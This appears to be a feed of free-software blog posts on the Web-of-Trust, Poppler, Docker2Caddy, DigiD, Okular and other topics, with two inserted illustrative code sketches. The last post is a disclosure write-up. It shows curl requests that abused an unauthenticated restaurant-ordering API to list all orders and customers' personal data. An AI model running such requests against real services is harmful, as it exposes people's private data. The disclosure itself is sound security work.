The essential problem with public key infrastructure (PKI) is not to obtain the encryption keys for contacts, but rather verify that the key you have of a contact really is the proper key and not that of an attacker. One straight-forward solution to this is used by every user of the internet every day. If you visit a website on the internet, the web server of the site presents your browser with its TLS certificate. Now the browser has to figure out, if this certificate is trustworthy. It does so by checking if there is a valid trust-path from one of its root certificates to the sites certificate. Your browser comes with a limited set of root-certificates already preinstalled. This set was agreed upon by your browsers/OS vendor at some point. These root certificates are (mostly) managed by corporations who’s business model is to vouch for your servers authenticity. You pay them so that they testify to others that your TLS certificate is legitimate.

In this case, a trust-path is a chain of certifications from the trusted root certificate down to the site’s TLS certificate. You can inspect this chain manually by clicking the lock icon in your browser’s task bar (at least on Firefox). Below is a visualization of the TLS certificate chain of this blog’s TLS certificate.

The certificate “ISRG Root X1” belongs to Let’s Encrypt, a not-for-profit CA that very likely is embedded in your browser already. R3 is an intermediate certificate authority of Let’s Encrypt. It certified my blog’s TLS certificate. Since during the certificate renewal process Let’s Encrypt made sure that my server controls my domain, it has some degree of confirmation that blog.jabberhead.tk in fact belongs to me. This step can be called manual identity verification. As a result, it can attest the legitimacy of my TLS certificate to others.

One property of this model is that it’s centralized. Although there are a number of root certificates (hundreds in fact, check your /etc/ssl/certs/ directory!), it is not trivial to set up your own, let alone get browser/OS vendors to include it in their distributions.

Now let’s take a look at the Web-of-Trust instead. The idea that best describes the difference between the centralized TLS model and the WoT is that people trust people instead of corporations. If Alice trusts and vouches for Bob, and Bob trusts and vouches for Charlie, Alice could transitively trust Charlie. These trust paths can get arbitrarily long and the whole network of trust paths is what we call the Web-of-Trust. Instead of relying on a more-or-less trustworthy certificate authority to attest key authenticity, we gather evidence for the trustworthiness of a key in our social circle.

This model can be applied to corporate environments as well, by the way. Let’s say FooBank is using the Web-of-Trust for their encrypted email traffic. FooBank’s admin would be tasked with keeping a list of the email addresses of all current employees and their encryption keys. They would then certify these keys by signing them with a company key which is kept secure. These certification signatures are valid as long as the employee is working at the bank. Other employees would in return sign the company key and mark it as trustworthy. Now they can build a trust path from their own key to that of each other current employee. In that sense, the CA model can be seen as a special case of the Web-of-Trust.

The main problem now is to find an algorithm for determining whether a valid trust path exists between our trust-root and the certificate of interest. You might wonder “What is the trust-root? I thought the WoT comes without centralized trust in a single entity?”. And you are right. But we all trust ourselves, don’t we? And we trust ourselves to decide whom to trust. So to realize the WoT, we define that each user has their own “trust-root” certificate, which is a single certificate that certifies “trusted introducers”. This is the start of the trust-path. In the case of FooBank, employee Albert might for example have a personal trust-root certificate that certifies FooBank’s CA key, as well as that of Albert’s wife Berta. Now Albert can securely message any FooBank employee, as well as his wife, since there are trust-paths available from his trust-root to those contacts.
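To make the trust-path idea concrete, here is an added sketch (not code from PGPainless, Sequoia or the specification) that searches a certification graph modelled on the FooBank scenario. It is a deliberately simplified model, not the specification's algorithm: the key names, the `introducer` flag, the expiry dates and the assumption that Berta is certified only as a contact are all constructed for illustration.

```python
from collections import deque
from dataclasses import dataclass
from datetime import date
from typing import Optional


@dataclass(frozen=True)
class Certification:
    issuer: str                      # key that made the certification
    target: str                      # key being certified
    introducer: bool = False         # issuer also trusts target to certify others
    expires: Optional[date] = None   # None means no expiry


def find_trust_path(certs, trust_root, target, today):
    """Return the shortest key chain from trust_root to target, or None.

    Simplified model (an assumption of this example, not the specification's
    algorithm): every key between root and target must have been certified
    as a trusted introducer, and expired certifications are ignored.
    """
    if target == trust_root:
        return [trust_root]
    outgoing = {}
    for cert in certs:
        if cert.expires is not None and cert.expires < today:
            continue
        outgoing.setdefault(cert.issuer, []).append(cert)

    queue = deque([[trust_root]])
    expanded = {trust_root}          # introducers already queued (stops cycles)
    while queue:
        path = queue.popleft()
        for cert in outgoing.get(path[-1], []):
            if cert.target == target:
                return path + [target]
            if cert.introducer and cert.target not in expanded:
                expanded.add(cert.target)
                queue.append(path + [cert.target])
    return None


# Constructed sample data modelled on the FooBank scenario in the text.
TODAY = date(2022, 5, 24)
CERTS = [
    Certification("albert-root", "foobank-ca", introducer=True),
    Certification("albert-root", "berta"),
    Certification("foobank-ca", "carol@foobank", expires=date(2023, 1, 1)),
    # Dave left the bank, so the CA's certification of his key has lapsed.
    Certification("foobank-ca", "dave@foobank", expires=date(2022, 3, 31)),
    # Berta vouches for a key, but Albert never made her an introducer.
    Certification("berta", "stranger"),
    # A certification loop must not make the search run forever.
    Certification("foobank-ca", "albert-root", introducer=True),
]

if __name__ == "__main__":
    for key in ("carol@foobank", "berta", "dave@foobank", "stranger"):
        print(key, "->", find_trust_path(CERTS, "albert-root", key, TODAY))
```

The two rejected lookups are the instructive ones: a lapsed certification and a certification issued by a non-introducer both leave the target key unauthenticated, even though a chain of signatures exists.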

Luckily, the problem of finding an algorithm to determine trust-paths is already solved by the Web-of-Trust specification. All that’s left to do is to understand and implement it. That cannot be that hard, can it?

To be continued…

Friday, 29 April 2022

Poppler finally has support for embedding fonts in PDF files!

Why would you want to embed fonts in PDF files, you are probably asking yourself?

Short answer: It fixes issues when adding text to the PDF files.

Long answer:

Poppler has had the feature of being able to fill in forms, create annotations and more recently add Digital Signatures to existing PDF files.

This works relatively well if you limit yourself to entering 'basic' ASCII characters, but once you go to more 'complex' characters, things don't really work. From the outside it seems like it should be relatively simple to fix, but things related to PDF are never as simple as they may seem.

In PDF each bit of text is associated with a Font object. That Font generally only supports one kind of text encoding and at most 'only' 65535 characters (65535 may seem a lot, but once you start taking into account non latin-based languages, you quickly 'run out' of characters).

What Poppler used to do in the past was just save the text in the PDF file and say "This text is written in Helvetica font", without even really caring to specify what 'Helvetica font' meant, and then let the PDF viewer (remember when we save the PDF file, it will not only be rendered by Poppler again, but potentially by Adobe Reader, Chrome, Firefox, etc.) try to figure out what to do with that information, which as said usually didn't go very well for the more 'complex' characters.

What we do now is that for each character of new text that we add to the file, we make sure to embed a font for it. So if you're writing something like 'holaħŋ↓' we may end up adding a few fonts to the PDF file, and then instead of saying 'This is the text and it's in Helvetica, good luck', we will say something like 'This text is characters 4, 67, 83 and 98 of embedded Font X, characters 4 and 99 of embedded Font X2 and character 16574 of embedded Font X3'. This way when the file is opened by a PDF viewer it is 'very easy' for them to do the right thing and show what we wanted.

Enough of technical talk! Now some screenshots to show how this has been fixed for Text Annotations, Forms and Signatures :)

Writing "hello↓漢you" to a form: [before and after screenshots]

Signing a PDF file with my name being "Albeŋŧ As漢tals Ciđ": [before and after screenshots]

Writing hola↓漢字 in a Text Annotation: [before and after screenshots]

Monday, 25 April 2022

Docker2Caddy - An automatic Reverse Proxy for Docker containers

So you have a number of Docker containers running web services which you would like to expose to the outside? Well, you probably will at least have considered a reverse proxy already. Doing this manually for one, two or even five containers may be feasible, but everything above that will be a PITA for sure. At the FSFE we ran into the same issue with our own distributed container infrastructure and crafted a neat solution that I would like to present to you in the next few minutes.

The result is Docker2Caddy that provides a workflow in which you can spin up new containers anytime (e.g. via a CI) and the reverse proxy will just do the rest for you magically.

The assumptions

Let’s assume you want to go with reverse proxies to make your web services accessible via ports 80 and 443. There are other possibilities, and in more complex environments there may be already integrated solutions, but for this article we’ll wade in a rather simple environment spun up with docker-compose [1].

Let’s also assume you care about security and go with a rootless installation of Docker. So the daemon will run as an unprivileged user. That’s possible but much more complex than the default rootful installation [2]. Because of this, a few other solutions will not work; we’ll check that later.

Finally, each container shall at least have one separate domain assigned to it for which you obviously want to have a valid certificate, e.g. by Let’s Encrypt.

In the examples below, we have two containers running, each running a webserver listening to port 8080. The first container shall be available via first.com, the second via second.net. The latter shall also be available via www.second.net.

The problems

In the described scenario, there are a number of problems for automating the configuration of the reverse proxy in order to direct a domain to the correct container, from container discovery to IPv6 routing to handling offline containers.

The reverse proxy has to be able to discover the currently running containers and ideally monitor for changes regularly so that a newly created container with a new domain is reachable within a short time without manual intervention.

Before Docker2Caddy we used nginx-proxy combined with acme-companion (formerly known as docker-letsencrypt-nginx-proxy-companion). These are Docker containers that query all containers connected to the bridge Docker network. For this to work, the containers have to run with environment variables indicating the desired domains and local ports that shall be proxied.

In a rootless Docker setup this finally reaches its limits although discovery still works. But already before that we did not like the fact that we had to connect containers to the bridge network upon creation and therefore lost a bit more isolation (which is dubious in Docker anyway).

Now, with rootless, IPv6 was the turning point. Even in rootful Docker setups, IPv6 – a 20+ years old, well defined standard protocol – is a pain in the butt. But with rootless, the FSFE System Hackers team did not manage to get IPv6 working in containers to the degree that we needed. While IPv6 traffic reached the nginx-proxy, it was then treated as IPv4 traffic with the internal Docker IP address. That ultimately bites you if you limit requests based on IP addresses, e.g. for signups or payments. All traffic via IPv6 will be treated as the same internal IPv4 address, therefore triggering the limits regularly.

The easiest solution therefore is to use a reverse proxy running on the host system, not as a Docker container with its severe limitations. While the first intuition led us to nginx, we decided to go with Caddy. The main advantages we saw are that a virtual host in Caddy is very simple to configure and that TLS certificates are generated and maintained automatically without extra dependencies like certbot.

In this setup, containers would need to open their webserver port to the host. This “public” port has to be unique per host, but the internal port can stay the same, e.g. port 1234 could be mapped to port 8080 inside the container. In Caddy you would then configure the domain first.com to forward to localhost:1234. A more or less identical second example container could then expose the port 5678 to the host, again listen on 8080 internally, and Caddy would forward second.net and www.second.net to localhost:5678.

But how does Caddy know about the currently running containers and the ports via which they want to receive traffic? And how can we handle containers that are unavailable, for instance because they crashed or have been deleted for good? Docker2Caddy to the rescue!

The solution

I already concluded that Caddy is a suitable reverse proxy for the outlined use case. But in order to be care-free, the configuration has to be generated automatically. For this to work, I wrote a rather simple Python application called Docker2Caddy that is kept running in the background via a systemd service and writes proper logs that are also rotated nicely.

This is how it works internally: it queries (in a configurable interval) the Docker daemon for running containers. For each container it looks for specific labels (that are also configurable), by default proxy.host, proxy.host_alias and proxy.port. If one or multiple containers are found – in our case two – one Caddy configuration file per container is created. This is based on a freely configurable Jinja2 template. If the configuration changed, e.g. by a new host, Caddy will be reloaded and will create a TLS certificate if needed.

But what happens if a container is unavailable? In Docker2Caddy you can configure a grace period. Until it has elapsed, the Caddy configuration for the container in question is not removed but can forward to a local or remote error page. Only afterwards is the configuration removed and Caddy subsequently reloaded.
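The polling round described above, as an added Python sketch that is not Docker2Caddy's own code. It uses the default label names from the article and adds one thing a security reviewer would want in such a generator: label values are validated before they reach the proxy configuration. The comma-separated format of `proxy.host_alias`, the plain string templates (standing in for Jinja2), the 503 fallback and the rule for conflicting host claims are assumptions of this example.

```python
import re

# Assumed site-block templates; Docker2Caddy itself renders Jinja2 templates.
ONLINE = "{hosts} {{\n    reverse_proxy localhost:{port}\n}}\n"
OFFLINE = '{hosts} {{\n    respond "Service temporarily unavailable" 503\n}}\n'

_LABEL = r"[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?"
HOSTNAME = re.compile(rf"(?:{_LABEL}\.)+[a-z]{{2,63}}")   # lowercase names only


def parse_labels(labels):
    """Validate one container's labels and return (hosts, port).

    Labels are written by whoever deploys a container, so anything that is
    not a plain host name or port number is rejected with ValueError before
    it can end up inside the proxy configuration.
    """
    if "proxy.host" not in labels or "proxy.port" not in labels:
        raise ValueError("proxy.host and proxy.port are required")
    # Assumption: proxy.host_alias holds comma-separated names.
    aliases = labels.get("proxy.host_alias", "").split(",")
    hosts = [labels["proxy.host"]] + [a.strip() for a in aliases if a.strip()]
    for host in hosts:
        if len(host) > 253 or not HOSTNAME.fullmatch(host):
            raise ValueError(f"not a valid host name: {host!r}")
    port = labels["proxy.port"]
    if not re.fullmatch(r"[0-9]{1,5}", port) or not 1 <= int(port) <= 65535:
        raise ValueError(f"not a valid port: {port!r}")
    return hosts, int(port)


def render_configs(running, state, now, grace_seconds):
    """Return {container_name: caddy_config_text} for one polling round.

    running: {container_name: labels} as reported by the Docker daemon.
    state:   {container_name: (hosts, port, last_seen)}, kept between rounds.
    """
    configs, claimed = {}, set()
    for name in sorted(running):
        try:
            hosts, port = parse_labels(running[name])
        except ValueError:
            state.pop(name, None)       # invalid labels never reach Caddy
            continue
        if claimed & set(hosts):
            state.pop(name, None)       # host already claimed (name order wins)
            continue
        claimed |= set(hosts)
        state[name] = (hosts, port, now)
        configs[name] = ONLINE.format(hosts=", ".join(hosts), port=port)
    for name, (hosts, port, last_seen) in list(state.items()):
        if name in configs:
            continue
        if now - last_seen > grace_seconds or claimed & set(hosts):
            del state[name]             # grace period over, or host re-claimed
        else:
            configs[name] = OFFLINE.format(hosts=", ".join(hosts))
    return configs


# Constructed sample: the two containers from the article plus one whose
# proxy.host label is not a plain host name.
RUNNING = {
    "first": {"proxy.host": "first.com", "proxy.port": "1234"},
    "second": {"proxy.host": "second.net", "proxy.host_alias": "www.second.net",
               "proxy.port": "5678"},
    "broken": {"proxy.host": "third.example { }", "proxy.port": "9999"},
}

if __name__ == "__main__":
    for name, text in render_configs(RUNNING, {}, now=0, grace_seconds=300).items():
        print(f"# {name}.caddy\n{text}")
```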

So, what makes Docker2Caddy special? I am biased but see a number of points:

  1. Simplicity: fundamentally it’s a Python script with 188 pure lines of code.
  2. Configurability: despite its simplicity, it’s easy to configure for various needs thanks to the templates and the support for rootless Docker setups.
  3. Adaptability: it should be rather simple to make Docker2Caddy also work for Podman, or even use different reverse proxies. Feel free to extend it before I’ll do it myself someday ;)
  4. Performance: while I did not perform before/after benchmarks, Caddy is blazingly fast and will surely perform better on the host than in a limited Docker container.

If you’re facing the same challenges in your setup, please feel free to try it out. Installation is quite simple and there’s even a minimal Ansible playbook. If you have feedback, I appreciate reading it via comments on Mastodon (see below), email, or, if you have an FSFE account, as a new issue or patch at the main repo.


  1. This is what a very minimal Docker service in the FSFE infrastructure looks like. For Docker2Caddy, only the docker-compose.yml file with its labels is relevant.

  2. If you’re interested in setting this up via Ansible, I can recommend the ansible-docker-rootless role which we integrated in our full-blown playbook for the container servers.

Friday, 08 April 2022

Short history of the "What is Free Software (Open Source)?" video

In February 2020, I was giving a talk titled "The core values of software freedom" at FOSDEM's largest auditorium (video recording). It was great to talk to such a large audience and have all those great discussions afterwards. Shortly afterwards, in March 2020, I gave the same talk at FOSS Backstage (video recording), especially enjoying the Q&A afterwards. Unfortunately, then the pandemic hit Europe, and it was my last conference in person for that year. So in the following months I heavily missed having in-person discussions with people I know and with new people I could have met at conferences.

Nevertheless, I had great online discussions about the topic of the talk, which encouraged me to think about how we can condense the message of the talk further to reach more people with it -- maybe with a short video similar to our "Public Money? Public Code!" video. When one person, who had already sent me kudos for my FOSDEM talk, heard about it, he offered to make a larger donation to cover the costs for such a video.

Alexander Lehmann, who also created the FSFE's "Public Money? Public Code!" video, was available with his team to work on the implementation of the video. It was a great pleasure to work with them on the video and find a way to condense a 30-minute talk into a short video.

We published this short "The Core Values of Software Freedom" video during the FSFE's 20-year anniversary, which was also the introduction of the FSFE's self-hosted PeerTube instance.

Afterwards, we received some feedback that people like the video, but would prefer an even shorter one, and they suggested shortening the existing video and making a few adjustments. After many people in the FSFE core team agreed to this, we again worked with Alexander Lehmann on the adjustments.

This week we published it: a video explaining the essential four rights to use, study, share, and improve software. Rights that help to support other fundamental freedoms like freedom of speech, press, and privacy. And all of that in less than 3 minutes, so the video can easily be shared whenever you want to quickly explain the topic to others.

Please share the video with friends, colleagues, and the public on different channels, embed it on your website with the provided code snippets, let us know how you like it by commenting, and if you see it on platforms which you are using, by rating the video there.

By doing this, you increase the chance that the video will be seen and recommended to people who have never heard of software freedom before. Help them learn what Free Software is, in less than 3 minutes!

Thank you.

Thursday, 07 April 2022

Shakedown cruise on the Baltic Sea

Just in time for a new cruising season to start, the story of our 2021 Baltic shakedown cruise is now online.

[Photos: In Swedish archipelago; Sailing in the Baltic]

This was a 666NM trip that we did on our new-to-us Amigo 40 cruising boat in August-September 2021. Apart from engine trouble in the beginning, this was a very enjoyable little adventure on the coasts of Sweden and Bornholm.

Trip route

The trip even earned us the first prize in the cruising log contest of our sailing club:

Fartenseglerpreise

Read the story now.

Thursday, 31 March 2022

What’s in a pronoun?

Today is Transgender Day of Visibility, and I am nonbinary Transgender.

I recently told people that I now prefer they/them, or any other gender neutral pronoun, such as spivak (e). But he/she is OK, depending on context too. Since I still go by my masculine name, most people use masculine pronouns.

In German there is no standardized neuter pronoun, I go by er/sie but strongly prefer er. By contrast Finnish has no binary gendered pronouns, the only one is hän, a gender neutral pronoun. When I started learning Finnish I had difficulty translating that pronoun. The use of hän does not misgender anyone, whether they are nonbinary or not. German has ternary grammatical gender, er (masculine), sie (feminine) and es (neuter).
The neuter pronoun is not commonly used to refer to a person, only to things and persons in some cases.

Sometimes I am a woman, sometimes a man, often both at the same time, so both pronouns are correct for me, so strictly speaking using one of those pronouns is not misgendering in my case. Still I prefer neutral pronouns, as those do not misgender anyone.

I mostly present masculine, but I do have a feminine voice, so that I can pass as a woman on the phone. I consider my voice more androgynous or in the upper part of the male range, which overlaps with the lower female range. When I first passed as a woman that way I was unaware of being Transgender and told people my masculine name, they were confused, because they were expecting a person with a masculine name not to be a woman. At that time, I began cosplaying female characters, wearing red lipstick and nail polish.

Later after more people I know came out as trans, or nonbinary, I knew that I was nonbinary too and began exploring the use of different names, using different pronouns for each name. I was a grammar geek long before, and once in Star Trek when Riker tried to avoid personal pronouns, I liked that.

Tobias Alexandra Platen (he/she/they) or short Alex (they/them only)

Wednesday, 16 March 2022

Dutch digital identity system crisis


Dutch digital identity verification system DigiD has announced the phasing out of SMS as second factor. That way they require citizens to install a smartphone app in order to use digital services from the government, municipalities, the health sector and others. These applications only work on iOS and Android phones, with reliance on third party services.

Plenty of members of our community choose not to use a device that is tied to vendor-specific services. There is a threat our community will practically be locked out of the digital infrastructure the government has set up for us to use. Official alternatives are to ask a friend with the app for help or go back to snail mail and physical meetings.

This is an urgent matter with a big impact, so if you share my concern, please make your voice heard to policymakers.

The commission Digital Affairs will meet on the 22nd of March to discuss the digital government which includes the topic of identity systems. I’ve written to members of this commission to call attention to this issue and share the views of our community.

In the summer of 2021 I received a letter from my municipality that it was time to renew my driving license. The letter mentioned two ways of getting a renewal: either physically visit city hall or use the experimental digital process that has been around since 2018. More information on this digital process can be found on the dedicated Dutch webpage.

 

The first time I heard of this experiment was a couple of years ago at my local photographer, who was one of the first photographers to take part in this trial. Certified photographers act as the main point of contact in the process by ensuring a good photograph and identifying the citizen making the request. My local photographer was excited to take part in this experiment to help ease the process for customers. I too was excited because this seemed like a well thought-out process that would reduce the number of contacts and visits to get a driving license renewal.

So now, a couple of years later, it was time for my renewal and I was about to experience how far our digital governmental services have come. I started the process by going to rijbewijsaanvragen.rdw.nl and I was immediately redirected to a DigiD prompt. DigiD is the login solution the Dutch government develops and uses. More information is available on Wikipedia and on the official website. Years ago DigiD was just using a username and password for verification, a single factor. Then SMS authentication was added as a possible second factor of authentication for improved security. Later a dedicated app was created for using your smartphone as a second factor, relying on the security features of the operating system. More recently an ability called check-id was added that lets apps read the NFC chip of identity cards and use that as the basis for authentication. More information on the identity card login method is available on the website.

When trying to start the digital request, this time the DigiD prompt didn’t show the SMS authentication option I would normally use. I could choose between the DigiD app and the option to read the NFC chip from the identity card. I was baffled and assumed I had perhaps made a mistake. Carefully retracing my steps, I retried, but again I was faced with the same prompt.

 

 

Doing some more research, I found out that SMS was not considered safe enough for this application, and so this project was set up to at least require an installed DigiD App as second factor, or the use of an NFC readout of your ID-card.

I actually didn’t want to install the DigiD Android app, despite having a Nokia 8.1 smartphone with Google One Android on it. My previous phone was a Fairphone 2 with Fairphone Open OS, the Google-free Android version by Fairphone. Having experienced the Google-free Android, I’ve become aware how much apps rely on Google libraries and services to function. It had taken me quite some experimentation to move my app usage over to apps that did not rely on Google Services. As I was considering another Google-free Android phone as my next phone, I didn’t want to commit myself to using an app that relied on Google to function, which the DigiD App does. Also I was looking towards a Linux phone like the Pinephone with Mobian, which would move me even further away from the Android app ecosystem.

I looked on the DigiD website for suggestions for this situation. The official recommendation is to ask somebody else with the DigiD app for help. I couldn’t believe what I was reading. My government was now the single strongest force pulling me into the vendor-tied smartphone ecosystem I resent. I had already read about SMS planned to be phased out (Dutch article by Tweakers.net) and how the government is fuelling the Google and Apple duopoly (Dutch article, Archive.is), but being faced with it in real life made it so much more real and urgent. Already in 2018 when I was using the Fairphone, I emailed DigiD to ask if the DigiD app could be provided outside of the Google Play store, but got an answer that that was not possible.

In contrast, the situation in Germany is quite the opposite. AusweisApp2 is the German identification app, which is available in F-Droid, Debian and many other Free Software repositories. All of this is made possible because the source code is provided under a Free Software license (EUPL v1.2). This allowed the community to make the application available on many different platforms. The AusweisApp2 uses the chip in the identity card or passport as the basis for identity. So the app merely has to facilitate in communications with online services. Compared to apps like DigiD that act as a digital identity directly, only having to relay information reduces the security requirements. And without the reliance on vendor-specific crypto libraries it is easier to open up the code for transparency and collaboration as the Germans have done.

I decided I would stand by my principle of not installing the app and try to see what I could achieve. Worst-case I had to go back to the physical process I had done the last time I got my driving license. So I reached out to the RDW team responsible for this digital process which was still called an experiment despite being a couple of years in use already. I explained my situation, mentioned that I was not willing to ask anybody for help because I didn’t want to be relying on others for my digital services, and I asked about alternatives. I got a formal reply repeating what I already read online: it was not possible without the app.

In the meantime there was also a desktop application available to read out the NFC chip of an identity card. This app is only available through the Windows 10 app store. With all my computers running Debian or Ubuntu, that was no option for me. Even besides the fact that I didn’t have an ID-card with an NFC chip in it to actually identify with. So unless the government starts releasing the applications for different operating systems, I don’t see this as a solution for me either.

 

Not having a solution that I could use by myself without relying on Google, I resorted to the traditional physical process. I went to my local photographer to get my picture taken, the same one that had told me about the digital process a few years earlier. He asked me if I wanted to use the digital process after I mentioned my picture was for my driving license renewal. I replied I didn’t want to make use of that because I didn’t want to install the app. And so I got my pictures in analog format, rather than them being sent digitally to the correct agency. Later I went to city hall to hand over my photograph and sign the papers requesting the renewal. A couple of days later I went back to city hall to pick up my new driving license, and that was that.

Compared to the digital process it took me one more trip to city hall to file the request and it took some more paperwork. For a single case this wasn’t so bad and it was something to overcome. But with SMS planned to be phased out in 2022 the impact would be much greater. Most online public services require a second factor of authentication now, and more and more services are becoming digital. Tax registration is one of the services that still allows authentication without a second factor of authentication, but for how long? Dealing with public services without the DigiD app will become increasingly difficult, and that is why we need a solution that meets the ‘vendor-neutral’ and ‘open’ principles that our government itself is calling for.

The Dutch DigiD app acts as the source of identity and thus relies on the frameworks by Apple and Android to guarantee a trustworthy identity. To ever achieve a Free Software app in the Netherlands we should not rely on the locked-down operating systems and libraries of vendors to provide security guarantees. Like in Germany, relying on an identification chip in hardware can provide the trust a government needs without introducing this reliance. Another solution might be the IRMA app which relies partly on online connectivity for its security. IRMA has an active community in the Netherlands consisting of public bodies like municipalities and several companies needing a secure and accessible means of authentication. Regardless of the technical solution we end up with, it is important that it is vendor-neutral, free software, based on open standards and open for community contributions like operating system support. In 2020 Waag together with other organizations has already pushed for these values in the #goedID campaign.

It worries me that our government so far seems inconsiderate of our stance. The information on the website seems to imply that if you don’t have a Google Android or Apple smartphone you lack digital skills and fall into the same category as the elderly. Our community is quite the contrary. Exactly because we are so skilled and knowledgeable we avoid corporate dependence where we can. We need to make our voices heard and let the government know that we expect them to step up their game. In the last couple of years our community has shown in the Netherlands the willingness and ability to cooperate. For example by contributing to open source applications like the Covid tracing and QR-code apps and by making them available on F-Droid. So let’s keep that spirit of collaboration and call out the government on the current crisis they created and demand a solution that meets our values.

Monday, 07 March 2022

Okular: Signature support now works on Android

This is a continuation of https://tsdgeos.blogspot.com/2022/02/okular-signature-verification-user.html

In that blog what was introduced was the new user interface to be able to see digital signatures in the mobile interface (i.e. the one that uses Kirigami instead of QWidgets).

You can use the Okular mobile interface anywhere you want, it's not really mobile-only, it's really mobile-optimized, so you can try it (though you'll have to build it manually since most distributions don't build it by default) on desktop Linux too.

Anyway, in that previous blog I talked about introducing the new user interface to be able to see digital signatures, and that worked out of the box in places that provide NSS like desktop Linux or Plasma Phone distributions (Aleix tried on the PinePhone and confirmed it works), but for Android it still did not work.

What was needed was something very similar to what we did for Windows https://tsdgeos.blogspot.com/2022/02/okular-signature-support-now-works-on.html but this time for Android.

I added a way for Craft to build NSS for Android and told it to not disable NSS when building poppler for Android; that should have been all.

But things are never simple enough...

For Android we use a tool called androiddeployqt, a tool that gathers everything needed for your project and creates the APK file for it. Unfortunately it has a documented limitation with runtime plugins: it has no way to know they are needed, so they are not packaged. NSS unfortunately has plugins, so after some "why is this crashing?" hours of scratching my head and debugging I realized the problem was that the missing plugins were not being "installed".

The workaround to make androiddeployqt work for plugins is basically linking the plugins to your binary. This way the plugin is a clear dependency and gets packaged, but did I say things are never simple enough?

In KDE we have binary-factory continuous integration for Android and we also have gitlab continuous integration for Android. Unfortunately they use different ways of building: the first uses Craft, the second does not. This means that in gitlab CI the NSS library is not available, so I can't link to it, but I need to link to it so that Craft on the binary-factory CI creates the APK files correctly.

To try to resolve that I came up with a patch that tried to differentiate if we were building inside Craft or the gitlab CI. Unfortunately, while that worked on my local setup, it did not work on the KDE servers, so in the end I settled for a much more pedestrian way: there's an option to enable the extra libraries and Craft enables that option when building Okular.

So after that, yes, it works as you can see in the screenshot below :)

Signature Properties User Interface

If you want you can download the Okular APK from https://binary-factory.kde.org/job/Okular_Nightly_android-arm64/ but beware there are still some limitations that don't make Okular usable day-to-day for Android, so we've created a Google Summer of Code potential project for that, maybe you're interested?

Sunday, 06 March 2022

Looking for Translators!

KDE produces amazing software, but sometimes not everyone can use it.

One of the reasons that can happen is because it's not translated to a language they understand.

For that we are calling for translators, especially for the languages listed below, which have not had a single translation update in the last year [*].

Committing to help means that you will do some work every now and then, not just translate a few texts only.

We will help you learn the tools needed and hopefully if you know more people that can help you can grow a team :)

If you're interested please email me at aacid@kde.org

Afrikaans
Armenian
Assamese
Bengali
Bosnian
Breton
Chhattisgarhi
Crimean Tatar
Croatian
Esperanto
Farsi
Frisian
Galician
Georgian
Gujarati
Hausa
Hebrew
Irish Gaelic
Kabyle
Kannada
Kashubian
Kazakh
Khmer
Kinyarwanda
Kurdish
Low Saxon
Luxembourgish
Macedonian
Maithili
Malay
Maltese
Marathi
Nepali
Northern Sotho
Occitan
Oriya
Pashto
Scottish Gaelic
Sinhala
Tatar
Telugu
Thai
Tswana
Uyghur
Uzbek
Walloon
Welsh
Xhosa

[*] apologies if indeed there were translations and my script failed for some reason

Friday, 25 February 2022

I went out for dinner and I took some endpoint

Three weeks ago I went out to a pub for dinner. Due to covid restrictions there are no paper menus anymore and the waitress gave me a card to place my order.

The card she gave me had a QR code and a 5-digit number. I scanned the QR code and opened the website it pointed to. To login I used that 5-digit number. I placed my order. So far so good.

When suddenly a hamburger button caught my attention. I pressed it, but mostly I clicked on the first item in the menu because, judging by its text, it seemed “nice” to have a look at the order I had just placed:

Hamburger button

Order history

Uh?! 4751€?! Definitely not me! To my surprise that page listed many orders, not just mine, and they were also old. That’s interesting.

Once back home, I wanted to understand it more. I opened the website in my browser, but I failed to login because my 5-digit number “expired”, then I gave it a few tries by increasing it and it worked :-)

I took a look at the JavaScript files to find the one that makes the request to retrieve the orders:

$.ajax({
  type: "POST",
  url: '/include/ajax.php?f=getlist&t=orders',
  data: {
    src:[
      {
        name:"self_cart_id",
        value:app.table_id,
        compare:"equal"
      }
    ],
    orderby: "id DESC"
  }
});

Let’s do the same request, changing the value (app.table_id) parameter and see what happens:

curl 'https://$HOST/include/ajax.php?f=getlist&t=orders' -X POST --data-raw "src%5B0%5D%5Bname%5D=self_cart_id&src%5B0%5D%5Bvalue%5D=1&src%5B0%5D%5Bcompare%5D=equal&orderby=id+DESC"

I got fewer orders. Then I increased the table_id and I got even fewer orders. Mmm, I took a second look at the parameters and then I realized that’s a query statement! At this point I played a bit with the parameters until I removed the value parameter completely. Well, now I got 347752 orders and they are even paginated:

"success": 1,
"pag": "1",
"per_pag": 500,
"total_records": 347752,
"total_pages": 696,

Fortunately, there was no sensitive information. I got all the orders made in the last ~2 years from all the pubs scattered around Italy (the pub is part of a franchise). There was some Deliveroo/UberEats/Glovo id, but nothing sensitive. Not yet.

Back to the JavaScript file, there were a few interesting calls:

    url: '/include/ajax.php?f=get&t=customers&id='+app.customer_id,
    url: '/include/ajax.php?f=edit_customer&t=self_cart&id='+app.table_id,
    url: '/include/ajax.php?f=getlist&t=categories',
    url: '/include/ajax.php?f=getlist&t=products',
    url: '/include/ajax.php?f=get&t=products&id='+$(this).attr("data-id"),
    url: '/include/ajax.php?f=edit_product&t=self_cart&id='+app.table_id,

I tried with the most tempting, customers, and here we go:

curl 'https://$HOST/include/ajax.php?f=getlist&t=customers'

"success": 1,
"pag": 1,
"per_pag": 500,
"total_records": 11928,
"total_pages": 24,
"rows": [
    {
        "surname": "<REDACTED>",
        "name": "<REDACTED>",
        "email": "<REDACTED>",
        "mobile": "<REDACTED>",
        "addresses": [
            {
                "name": "<REDACTED>",
                "surname": "",
                "address": "<REDACTED>",
                "zipcode": "<REDACTED>",
                "city": "<REDACTED>",
                "province": "<REDACTED>",
                "coord": "44.6<REDACTED>, 10.6<REDACTED>",
                "doorphone": "<REDACTED>",
            }
        ]
        "barcode": "https:\/\/api.$ANOTHER_HOST\/include\/barcode.php?f=png&s=code-128&d=1",

That single request returned 500 out of 11928 results that include full names, phone numbers and addresses of real persons who placed their orders through one of those food delivery apps.

Back to the JavaScript file, the edit_product call is also very tempting (what if I change the price of a product, place my order, and then restore the original price?), but I had already eaten dinner and didn’t try it.

Finally, the $ANOTHER_HOST domain got my attention because it points to a different domain. I googled it and I then realized that this pub was using an e-commerce made by a company that claims on their website that they serve 570 restaurants in Italy. Which makes that 11928 way larger.

To confirm this, I first googled the footer text in the e-commerce and actually found ~100 other websites using it that are affected by the same issue. Then, I found others using DNS enumeration targeting the $ANOTHER_HOST domain.

I warned the company about the unauthenticated endpoints and the possible data leak affecting them and their customers. They politely replied that they don’t provide bug bounties and the endpoints have been patched.
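
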